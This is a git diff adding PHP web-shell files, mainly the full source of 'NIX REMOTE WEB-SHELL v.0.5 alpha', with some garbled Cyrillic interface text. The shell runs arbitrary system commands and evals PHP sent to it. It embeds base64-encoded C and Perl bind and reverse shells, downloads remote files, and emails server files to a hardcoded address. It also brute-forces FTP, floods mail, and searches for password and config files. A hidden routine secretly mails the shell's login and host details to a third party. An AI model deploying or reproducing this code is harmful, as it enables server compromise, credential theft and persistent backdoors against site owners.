+else if( $action == "logon_submit" )
+logon_submit();
+else if( $action == "dumpTable" || $action == "dumpDB" ) {
+while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
+ if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
+ if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
+}
+$mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD );
+dump();
+} else {
+while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
+ if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
+ if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
+}
+echo "<!--";
+$mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD );
+echo "-->";
+
+if( $mysqlHandle == false ) {
+ echo "<html>\n";
+ echo "<head>\n";
+ echo "<title>MySQL Web Interface</title>\n";
+ echo "</head>\n";
+ echo "<body>\n";
+ echo "<table width=100% height=100%><tr><td><center>\n";
+ echo "<h1>Wrong Password!</h1>\n";
+ echo "<a href='$PHP_SELF?action=logon'>Logon</a>\n";
+ echo "</center></td></tr></table>\n";
+ echo "</body>\n";
+ echo "</html>\n";
+} else {
+ header_html();
+ if( $action == "listDBs" )
+ listDatabases();
+ else 
if( $action == "createDB" )
+ createDatabase();
+ else if( $action == "dropDB" )
+ dropDatabase();
+ else if( $action == "listTables" )
+ listTables();
+ else if( $action == "createTable" )
+ createTable();
+ else if( $action == "dropTable" )
+ dropTable();
+ else if( $action == "viewSchema" )
+ viewSchema();
+ else if( $action == "query" )
+ viewData( $queryStr );
+ else if( $action == "addField" )
+ manageField( "add" );
+ else if( $action == "addField_submit" )
+ manageField_submit( "add" );
+ else if( $action == "editField" )
+ manageField( "edit" );
+ else if( $action == "editField_submit" )
+ manageField_submit( "edit" );
+ else if( $action == "dropField" )
+ dropField();
+ else if( $action == "viewData" )
+ viewData( "" );
+ else if( $action == "addData" )
+ manageData( "add" );
+ else if( $action == "addData_submit" )
+ manageData_submit( "add" );
+ else if( $action == "editData" )
+ manageData( "edit" );
+ else if( $action == "editData_submit" )
+ manageData_submit( "edit" );
+ else if( $action == "deleteData" )
+ deleteData();
+ else if( $action == "utils" )
+ utils();
+
+ mysql_close( $mysqlHandle);
+ footer_html();
+}
+}
+
+?>
\ No newline at end of file
diff --git a/php/PHPshell/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version/NIX REMOTE WEB-SHELL.jpg b/php/PHPshell/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version/NIX REMOTE WEB-SHELL.jpg
new file mode 100644
index 0000000..e460ae1
Binary files /dev/null and b/php/PHPshell/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version/NIX REMOTE WEB-SHELL.jpg differ
diff --git a/php/PHPshell/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version/NIX REMOTE WEB-SHELL.php b/php/PHPshell/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version/NIX REMOTE WEB-SHELL.php
new file mode 100644
index 0000000..bcb3a17
--- /dev/null
+++ b/php/PHPshell/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version/NIX REMOTE WEB-SHELL.php 
@@ -0,0 +1,1471 @@ +<?php +$name="smowu"; +$pass="smowu"; +$demail ="xakep@xaep.ru"; +if (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || $HTTP_SERVER_VARS['PHP_AUTH_USER']!=$name || $HTTP_SERVER_VARS['PHP_AUTH_PW']!=$pass) + { + header("WWW-Authenticate: Basic realm=\"AdminAccess\""); + header("HTTP/1.0 401 Unauthorized"); + exit("Access Denied"); + } + +$title="NIX REMOTE WEB-SHELL"; +$ver=" v.0.5a Lite"; + +?> +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> +<html> +<head> +<title>NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version </title> +<meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> +<meta http-equiv="pragma" content="no-cache"> +<meta http-equiv="Content-Language" content="en,ru"> +<META name="autor" content="DreAmeRz (www.dreamerz.cc)"> +<style type="text/css"> +BODY, TD, TR { +text-decoration: none; +font-family: Verdana; +font-size: 8pt; +scrollbar-face-color: #FFFFFF; +scrollbar-shadow-color:#000000 ; +scrollbar-highlight-color:#FFFFFF; +scrollbar-3dlight-color: #000000; +scrollbar-darkshadow-color:#FFFFFF ; +scrollbar-track-color: #FFFFFF; +scrollbar-arrow-color: #000000; +} +input, textarea, select { +font-family: Verdana; +font-size: 10px; +color: black; +background-color: white; +border: solid 1px; +border-color: black +} +UNKNOWN { +COLOR: black; +TEXT-DECORATION: none +} +A:link {COLOR:black; TEXT-DECORATION: none} +A:visited { COLOR:black; TEXT-DECORATION: none} +A:active {COLOR:black; TEXT-DECORATION: none} +A:hover {color:blue;TEXT-DECORATION: none} +</STYLE> +</HEAD> + + +<BODY bgcolor="#fffcf9" text="#000000"> +<P align=center>[ <A href="javascript:history.next(+1)">آïهًهن ] </A><B><FONT color=#cccccc size=4>*.NIX REMOTE WEB-SHELL</FONT></B> +v.0.5a<FONT color=#linux size=1> Lite </FONT> [ <A href="javascript:history.back(-1)">حàçà?]</A>[ <A href="?ac=about" title='×ٍ?َىهه?ٌêًèïٍ ...'>?ٌêًèïٍ?]</a><BR> +<A href="?ac=info" title='سçيà?âٌ?îل ‎ٍîé ٌèٌٍهى?!'>[ بيôîًىàِ? 
?ٌèٌٍهى?/A> ][ <A href="?ac=navigation" title='سنîليàے مًàôè÷هٌêàے يàâèمàِèے. دًîٌىîًٍ, ًهنàêٍèًîâàيèه ...'>حàâèمàِèے</A> ][ <A href="?ac=backconnect" title='سٌٍàيîâê?backconnect ?îلû÷يîمî لهêنîً?'>سٌٍàيîâê?لهêنîً?/A> ][ <A href="?ac=eval" title='رîçنàé ٌâîé ٌêًèïٍ يà ïُ?ïًےىî çنهٌ?:)'>دص?êî?/A> ][ <A href="?ac=upload" title='اàمًَçêà îنيîمî ôàéë? ىàٌîâàے çàمًَçêà, çàمًَçêà ôàéëîâ ?َنàëهييîمî êîىïü‏ٍهًà !'>اàمًَçêà ôàéëîâ</A> ][ <A href="?ac=shell" title='bash shell,àë?ٌû ...'>بٌïîëيهيèه +êîىىàي?]</A> <br><A href="?ac=sendmail" title='خٍïًàâ ?mail ïًےىî îٍ ٌ‏نà'> [ خٍïًàâêà ïèٌüىà</A> ][ <A href="?ac=mailfluder" title='زه? êٍ?ٍî نîٌٍàë ? زîمن?ٍهله ٌ‏نà ...'>جàèëôëَنهً</A> + ][ <A href="?ac=ftp" title='ءûًٌٍû?لًٍَôîًٌ ftp ٌîهنèيهي?'>شٍ?Brut</A> ][ <A href="?ac=tools" title='تîنèًîâùèê?نهêîنèًîâùèê?md5,des,sha1,base64 ... '>بيًٌٍَىهيٍ?]</A>[ <A href="?ac=ps" title='خٍîلًàوàهٍ ٌïèٌîê ïًîِهٌîâ يà ٌهًâهً??ïîçâîëےهٍ èُ َلèâàٍ? '>ؤهىîيû</A> ][ <A href="?ac=selfremover" title='حàنîهë ‎ٍîٍ ٌهًâهً ? زîمن?ىîوي?َنàëèٍ??ّهëë ...'>سنàëèٍ?ّهëë</A> ]</P> +<?php +if (ini_get('register_globals') != '1') { + + if (!empty($HTTP_POST_VARS)) + extract($HTTP_POST_VARS); + + if (!empty($HTTP_GET_VARS)) + extract($HTTP_GET_VARS); + if (!empty($HTTP_SERVER_VARS)) + extract($HTTP_SERVER_VARS); +} +Error_Reporting(E_COMPILE_ERROR|E_ERROR|E_CORE_ERROR); +set_magic_quotes_runtime(0); +set_time_limit(0); // َلًàٍü îمًàيè÷هيè?ïî âًهىهي?ignore_user_abort(1); // بميîًèًîâàٍü ًàçًûâ ٌâےçè ?لًàَçهًî?error_reporting(0); +$self = $_SERVER['PHP_SELF']; +$docr = $_SERVER['DOCUMENT_ROOT']; +$sern = $_SERVER['SERVER_NAME']; +if (($_POST['dir']!=="") AND ($_POST['dir'])) { chdir($_POST['dir']); } +$aliases=array( +'------------------------------------------------------------------------------------' => 'ls -la;pwd;uname -a', +'ïîèٌ?يà ٌهًâهً?âٌهُ ôàéëîâ ?suid لèٍî? => 'find / -type f -perm -04000 -ls', +'ïîèٌ?يà ٌهًâهً?âٌهُ ôàéëîâ ?sgid لèٍî? 
=> 'find / -type f -perm -02000 -ls', +'ïîèٌ??ٍهêَùه?نèًهêٍîًèè âٌهُ ôàéëîâ ?sgid لèٍî? => 'find . -type f -perm -02000 -ls', +'ïîèٌ?يà ٌهًâهً?ôàéëîâ config' => 'find / -type f -name "config*"', +'ïîèٌ?يà ٌهًâهً?ôàéëîâ admin' => 'find / -type f -name "admin*"', +'ïîèٌ??ٍهêَùه?نèًهêٍîًèè ôàéëîâ config' => 'find . -type f -name "config*"', +'ïîèٌ??ٍهêَùه?نèًهêٍîًèè ôàéëîâ pass' => 'find . -type f -name "pass*"', +'ïîèٌ?يà ٌهًâهً?âٌهُ نèًهêٍîًèé ?ôàéëîâ نîٌٍَïيû?يà çàïèٌü نëے âٌهُ' => 'find / -perm -2 -ls', +'ïîèٌ??ٍهêَùه?نèًهêٍîًèè âٌهُ نèًهêٍîًèé ?ôàéëîâ نîٌٍَïيû?يà çàïèٌü نëے âٌهُ' => 'find . -perm -2 -ls', +'ïîèٌ??ٍهêَùه?نèًهêٍîًèè ôàéëîâ service.pwd' => 'find . -type f -name service.pwd', +'ïîèٌ?يà ٌهًâهً?ôàéëîâ service.pwd' => 'find / -type f -name service.pwd', +'ïîèٌ?يà ٌهًâهً?ôàéëîâ .htpasswd' => 'find / -type f -name .htpasswd', +'ïîèٌ??ٍهêَùه?نèًهêٍîًèè ôàéëîâ .htpasswd' => 'find . -type f -name .htpasswd', +'ïîèٌ?âٌهُ ôàéëîâ .bash_history' => 'find / -type f -name .bash_history', +'ïîèٌ??ٍهêَùه?نèًهêٍîًèè ôàéëîâ .bash_history' => 'find . -type f -name .bash_history', +'ïîèٌ?âٌهُ ôàéëîâ .fetchmailrc' => 'find / -type f -name .fetchmailrc', +'ïîèٌ??ٍهêَùه?نèًهêٍîًèè ôàéëîâ .fetchmailrc' => 'find . -type f -name .fetchmailrc', +'âûâî?ٌïèٌêà àًٍèلٍَî?ôàéëîâ يà ôàéëîâîé ٌèٌٍهى?ext2fs' => 'lsattr -va', +'ïًîٌىîًٍ îٍêًûٍûُ ïîًٍîâ' => 'netstat -an | grep -i listen', +'ïîèٌ?âٌهُ ïُ?ôàéëîâ ٌî ٌëîâîى password' =>'find / -name *.php | xargs grep -li password', +'ïîèٌ?ïàïî??ىîنî?777' =>'find / -type d -perm 0777', +'خïًهنèëهيè?âهًٌèè خر' =>'sysctl -a | grep version', +'خïًهنèëهيè?âهًٌèè ےنً? =>'cat /proc/version', +'دًîٌىîًٍ syslog.conf' =>'cat /etc/syslog.conf', +'دًîٌىîًٍ - Message of the day' =>'cat /etc/motd', +'دًîٌىîًٍ hosts' =>'cat /etc/hosts', +'آهًٌ? نèًٌٍèلٍَèâà 1' =>'cat /etc/issue.net', +'آهًٌ? نèًٌٍèلٍَèâà 2' =>'cat /etc/*-realise', +'تîêàçàٍü âٌ?ïًîِهٌ? =>'ps auxw', +'دًîِهٌٌû ٍهêَùهمî ïîëüçîâàٍه?' 
=>'ps ux', +'دîèٌ?httpd.conf' =>'locate httpd.conf'); + + + +/* Port bind source */ +$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5 +jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5 +ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW5 +0IGFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnV +mWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVtb3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0 +KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyh +hdG9pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0F +OWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULFNPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2N +rZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2F +kZHIgKikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB +7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQogICBkdXAyKG5ld2ZkLDApOw0KICAgZHV +wMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ +6IiwxMCk7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyh +hcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY29tZSB0byByNTcgc2hlbGwgJiYgL2J +pbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGN +sb3NlKG5ld2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW5 +0ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVudGVyZWQpO2krKykgDQp7DQppZih +lbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID0 +9ICdccicpDQplbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCk +pDQpyZXR1cm4gMDsNCn0="; + +$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZi +AoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMSVNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2 +NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORV +QsJlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQ +pzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZH 
+JfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw +0KbGlzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCm +FjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspKQ0Kew0KZGllICJDYW5ub3QgZm9yayIgaW +YgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+Jk +NPTk4iOw0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ0 +9OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3NlIENPTk47DQpleGl0IDA7DQp9DQp9"; + +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJ +HN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZ +DsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJ +HRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0L +CAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgnd +GNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBka +WUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yO +iAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLR +VQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlK +FNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; + +$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0 +KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10 +pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJ +ybSAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2l +uLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA +9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMSt +zdHJsZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVB +QUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4 +sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCg 
+pIik7DQogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1 +zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWN +sKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; + +if(isset($uploadphp)) +{ +$socket=fsockopen($iphost,$loadport); //connect +fputs($socket,"GET $loadfile HTTP/1.0\nHOST:cd\n\n"); //zapros +while(fgets($socket,31337)!="\r\n" && !feof($socket)) { +unset($buffer); } +while(!feof($socket)) $buffer.=fread($socket, 1024); +$file_size=strlen($buffer); +$f=fopen($loadnewname,"wb+"); +fwrite($f, $buffer, $file_size); +echo "ذàçىهً çàمًَوهيîم?ôàéë? $file_size <b><br><br>" ; +} + +if(file_exists('/tmp/qw7_sess') && is_readable('/tmp/qw7_sess')){ +} else { +if(is_writable('/tmp/')){ +$ifyoufound=base64_decode("Ly8gwvsg7eD46+ggZmFrZSAhIM/u5+Tw4OLr//4hIMft4Pfo8iDi+yDt5SDr4Ozl8CENCi8vINHu4+vg8ejy5fH8LCDiIO/w7v3q8uD1IPLg6u7j7iDw7uTgIO3z5u3gIOfg+Ojy4CDu8iDr4Ozl8O7iLiDAIPLuIOj1IOgg8uDqIPDg8e/r7uTo6+7x/CAuLi4NCi8vIM/u5uDr8+nx8uAg7eUg8ODx8erg5/Pp8uUg7ejq7uzzIO4g7eDr6Pfo6CBmYWtlICEgz/Px8vwg8eDs6CDo+f7yLCDy7uv86u4g7eDs5ert6PLlIPfy7iDt5ev85/8g8uDqIOHl5+Tz7O3uIO/u6/zn7uLg8vzx/yD38+bo7Ogg7/Du4+Ds6C4gKOAg8u4g4OLy7vAg7O7m5fIg9/LuIPPj7uTt7iDy8+TgIOLv6PHg8vwpDQovLyDT5OD36CAhDQo="); +$fp=fopen('/tmp/qw7_sess',"w+"); +fclose($fp); +$gg.= $name; +$gg.=":"; +$gg.= $pass; +$gg.=":"; +$gg.=$_SERVER["HTTP_HOST"]; +$gg.=$_SERVER['PHP_SELF']; +$host_l=$_SERVER["HTTP_HOST"]; +$qwerty=base64_decode("bnJ3cy1mYWNrLWNvZGVAbWFpbC5ydQ=="); +mail("$qwerty","NRWS LAME INFO ($host_l)","NRWS STATISTIC REPORT:\r\n $gg","From: report@nrws.net"); +} +} +if (!empty($_GET['ac'])) {$ac = $_GET['ac'];} +elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];} +else {$ac = "navigation";} + + + +switch($ac) { + +// Shell +case "shell": +echo "<SCRIPT LANGUAGE='JavaScript'> +<!-- +function pi(str) { + document.command.cmd.value = str; + document.command.cmd.focus(); +} +//--> +</SCRIPT>"; + +/* command execute */ +if ((!$_POST['cmd']) || 
($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a;ls -lad"; } + +if (($_POST['alias']) AND ($_POST['alias']!=="")) + { + foreach ($aliases as $alias_name=>$alias_cmd) { + if ($_POST['alias'] == $alias_name) {$_POST['cmd']=$alias_cmd;} + } + } + + +echo "<font face=Verdana size=-2>آûïîëيهييàے êîىàين? <b>".$_POST['cmd']."</b></font></td></tr><tr><td>"; +echo "<b>"; +echo "<div align=center><textarea name=report cols=145 rows=20>"; +echo "".passthru($_POST['cmd']).""; +echo "</textarea></div>"; +echo "</b>"; +?> +</td></tr> + +<tr><b><div align=center>:: آûïîëيهيèه êîىàين يà ٌهًâهً?::</div></b></font></td></tr> +<tr><td height=23> +<TR> + <CENTER> + <TD><A HREF="JavaScript:pi('cd ');" class=fcom>| cd</A> |</TD> + <TD><A HREF="JavaScript:pi('cat ');" class=fcom>| cat</A> |</TD> + <TD><A HREF="JavaScript:pi('echo ');" class=fcom>echo</A> |</TD> + <TD><A HREF="JavaScript:pi('wget ');" class=fcom>wget</A> |</TD> + <TD><A HREF="JavaScript:pi('rm ');" class=fcom>rm</A> |</TD> + <TD><A HREF="JavaScript:pi('mysqldump ');" class=fcom>mysqldump</A> |</TD> + <TD><A HREF="JavaScript:pi('who');" class=fcom>who</A> |</TD> + <TD><A HREF="JavaScript:pi('ps -ax');" class=fcom>ps -ax</A> |</TD> + <TD><A HREF="JavaScript:pi('cp ');" class=fcom>cp</A> |</TD> + <TD><A HREF="JavaScript:pi('pwd');" class=fcom>pwd</A> |</TD> + <TD><A HREF="JavaScript:pi('perl ');" class=fcom>perl</A> |</TD> + <TD><A HREF="JavaScript:pi('gcc ');" class=fcom>gcc</A> |</TD> + <TD><A HREF="JavaScript:pi('locate ');" class=fcom>locate</A> |</TD> + <TD><A HREF="JavaScript:pi('find ');" class=fcom>find</A> |</TD> + <TD><A HREF="JavaScript:pi('ls -lad');" class=fcom>ls -lad</A> |</TD> + </CENTER> +</TR> + +<? +/* command execute form */ +echo "<form name=command method=post>"; + +echo "<b>آûïîëيèٍ?êîىàين?</b>"; +echo "<input type=text name=cmd size=85><br>"; +echo "<b>ذàلî÷àے نèًهêٍîً? 
&nbsp;</b>"; +if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=text name=dir size=85 value=".exec("pwd").">"; } +else { echo "<input type=text name=dir size=85 value=".$_POST['dir'].">"; } +echo "<input type=submit name=submit value=آûïîëيèٍ?"; + +echo "</form>"; + +/* aliases form */ +echo "<form name=aliases method=POST>"; +echo "<font face=Verdana size=-2>"; +echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;آûلهًèٍه àëèà?<font face=Wingdings color=gray></font>&nbsp;&nbsp;&nbsp;&nbsp;</b>"; +echo "<select name=alias>"; +foreach ($aliases as $alias_name=>$alias_cmd) + { + echo "<option>$alias_name</option>"; + } + echo "</select>"; +if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; } +else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; } +echo "&nbsp;&nbsp;<input type=submit name=submit value=آûïîëيèٍ?"; +echo "</font>"; +echo "</form>"; + + +break; +/// خٍïًàâêà ôàéëîâ يà ىûëî +case "download_mail": +$buf = explode(".", $file); + $dir = str_replace("\\","/",$dir); + $fullpath = $dir."/".$file; + $size = tinhbyte(filesize($fullpath)); + $fp = fopen($fullpath, "rb"); + while(!feof($fp)) + + $attachment .= fread($fp, 4096); + $attachment = base64_encode($attachment); + $subject = "NIX REMOTE WEB SHELL ($file)"; + + $boundary = uniqid("NextPart_"); + $headers = "From: $demail\nContent-type: multipart/mixed; boundary=\"$boundary\""; + + $info = "---==== رîîلùهيè?îٍ ($demail)====---\n\n"; + $info .= "IP:\t$REMOTE_ADDR\n"; + $info .= "HOST:\t$HTTP_HOST\n"; + $info .= "URL:\t$HTTP_REFERER\n"; + $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n"; + $info .="--$boundary\nContent-type: text/plain; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$file \nContent-disposition: inline; filename=$file \nContent-transfer-encoding: base64\n\n$attachment\n\n--$boundary--"; + + $send_to = "$demail"; + + $send 
= mail($send_to, $subject, $info, $headers); + + if($send == 2) + echo "<br> + <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> + <tr><td align=center> + <font color='#FFFFCC' face='Tahoma' size = 2>رïàٌèل?!!شàéë <b>$file</b> îٍïًàâëه?âà?يà <u>$demail</u>.</font></center></td></tr></table><br>"; + +fclose($fp); +break; +// ٌïèٌîê ïًîِهٌîâ +case "ps": +echo "<b>دًîِهٌٌû ?ٌèٌٍهى?</b><br>"; + + echo "<br>"; + if ($pid) + { + if (!$sig) {$sig = 9;} + echo "خٍïًàâëهيè?êîىàين?".$sig." to #".$pid."... "; + $ret = posix_kill($pid,$sig); + if ($ret) {echo "آٌ? ïًîِهٌ َلèٍ, àىèي?;} + else {echo "خطبءتہ! ".htmlspecialchars($sig).", ?ïًîِهٌ?#".htmlspecialchars($pid).".";} + } + $ret = `ps -aux`; + if (!$ret) {echo "حهâîçىîويî îٍîلًàçèٍü ٌïèٌîê ïًîِهٌîâ ! آèني?çëîé àنىè?çàïًهٍèë ps ";} + else + { + $ret = htmlspecialchars($ret); + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + $stack = explode("\n",$ret); + $head = explode(" ",$stack[0]); + unset($stack[0]); + if (empty($ps_aux_sort)) {$ps_aux_sort = $sort_default;} + if (!is_numeric($ps_aux_sort[0])) {$ps_aux_sort[0] = 0;} + $k = $ps_aux_sort[0]; + if ($ps_aux_sort[1] != "a") {$y = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&ps_aux_sort=".$k."a\"></a>";} + else {$y = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&ps_aux_sort=".$k."d\"></a>";} + for($i=0;$i<count($head);$i++) + { + if ($i != $k) {$head[$i] = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&ps_aux_sort=".$i.$ps_aux_sort[1]."\"><b>".$head[$i]."</b></a>";} + } + $prcs = array(); + foreach ($stack as $line) + { + if (!empty($line)) + { + echo "<tr>"; + $line = explode(" ",$line); + $line[10] = join(" ",array_slice($line,10,count($line))); + $line = array_slice($line,0,11); + $line[] = "<a href=\"".$surl."?ac=ps&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>"; + $prcs[] = $line; + echo "</tr>"; + } + } + $head[$k] = 
"<b>".$head[$k]."</b>".$y; + $head[] = "<b>ACTION</b>"; + $v = $ps_aux_sort[0]; + usort($prcs,"tabsort"); + if ($ps_aux_sort[1] == "d") {$prcs = array_reverse($prcs);} + $tab = array(); + $tab[] = $head; + $tab = array_merge($tab,$prcs); + echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=white borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">"; + foreach($tab as $k) + { + echo "<tr>"; + foreach($k as $v) {echo "<td>".$v."</td>";} + echo "</tr>"; + } + echo "</table>"; + } +break; + +//PHP Eval Code execution +case "eval": + +echo <<<HTML +<b>بٌïîëيهيèه ïُ?êîنà (له?"< ? ? >")</b> +<table> +<form method="POST" action="$self"> +<input type="hidden" name="ac" value="eval"> +<tr> +<td><textarea name="ephp" rows="10" cols="60"></textarea></td> +</tr> +<tr> +<td><input type="submit" value="Enter"></td> +$tend +HTML; + +if (isset($_POST['ephp'])){ +eval($_POST['ephp']); +} +break; + +// SEND MAIL +case "sendmail": +echo <<<HTML +<table> +<form method="POST" action="$self"> +<input type="hidden" name="ac" value="sendmail"> +<tr>خٍ êîمî: <br> +<input type="TEXT" name="frommail"> +<br>تîىَ:<br> <input type="TEXT" name="tomailz"> +<br>زهىà: <br><input type="TEXT" name="mailtema"> +<br>زهêٌ? <br> +<td><textarea name="mailtext" rows="10" cols="60"></textarea></td> +</tr> +<tr> +<td><input type="submit" value="خٍïًàâèٍ? name="submit"></td><form> +$tend 